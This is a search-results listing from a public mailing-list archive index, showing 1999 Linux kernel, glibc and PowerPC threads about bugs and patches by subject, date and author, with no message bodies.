1999-02-26 16:13 64% Bug in G3 serial - stty causes total lockup puetzk6715
1999-03-31 20:14 64% [linux-lvm] Bug in the Major number increments? FryarD
1999-04-01 15:18 53% Bug in LinuxThreads? Charles A. Jolley
1999-04-01 18:57 64% ` Kevin B. Hendricks
1999-04-06 16:31 64% HAL2 spec bug Ulf Carlsson
1999-04-22  0:12 64% boundary condition bug fix for vmalloc() Kanoj Sarcar
1999-04-22 15:30 64% ` Patch: " Stephen C. Tweedie
1999-05-08 12:20 63% [BUG] in glibc-2.1.1-6b: gethostbyname broken Martin Costabel
1999-05-09 22:20 64% ` Franz Sirl
1999-05-10 18:56 64% Indy SC bug Ulf Carlsson
     [not found]     <Pine.LNX.4.03.9905111114210.19954-100000@baltimore.wwaves.com>
1999-05-11 21:30 61% ` Swap Questions (includes possible bug) - swapfile.c / swap.c Rik van Riel
1999-05-12 15:42 58%   ` [PATCH] " Joseph Pranevich
1999-05-12 10:30 64% Manfred Spraul
1999-05-12 18:36 64% ` Stephen C. Tweedie
1999-05-12 19:45 44%   ` Manfred Spraul
     [not found]     <Pine.LNX.3.96.990515232120.14004A-101000@artax.karlin.mff.cuni.cz>
1999-05-16  4:40 35% ` [FYI][RFC] Way to deal with filesystems with jumping pieces of inodes (was Re: HPFS bug in lookup()) Alexander Viro
1999-05-19 20:19 62% possible egcs c compiler bug Thomas C. Allison
1999-05-19 20:56 64% ` Brad Boyer
1999-05-19 21:04 64% ` Hartmut Koptein
1999-05-19 21:26 64% ` Franz Sirl
1999-05-24 22:00 64% AWACS Bug Scott Sams
1999-05-25 10:42 64% ` Benjamin Herrenschmidt
     [not found]     <Pine.GSO.4.05.9905251646130.14882-100000@mail.wesleyan.edu>
1999-05-27  4:42 64% ` Scott Sams
1999-05-27  5:19 58%   ` Jason Y. Sproul
1999-05-27 18:25     Problems with vger 2.3.3/4 Martin Costabel
1999-06-02 12:19 59% ` Bug in vger 2.2.10 and 2.3.4 (Re: Problems with vger 2.3.3/4) Martin Costabel
1999-06-03  1:24 64%   ` Ryuichi Oikawa
1999-06-03  2:50 64%   ` Paul Mackerras
1999-06-03  6:26 64%     ` Martin Costabel
1999-06-03 22:24 64%     ` Martin Costabel
1999-06-02 20:05 64% patch for dmasound bug Ryan Nielsen
1999-06-10 22:56 63% ` Alvin Brattli
1999-06-07  8:54 64% Bug report Alexander Larsson
1999-06-07 13:53 64% ` Dan Malek
     [not found]     <E10r9LE-0006v4-00@the-village.bc.nu>
1999-06-09  1:10 64% ` [PATCH] Re: Bug: Tracing recursive system calls Nate Eldredge
1999-06-09  3:28 59% TurboMax driver bug Brian C Burke

This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.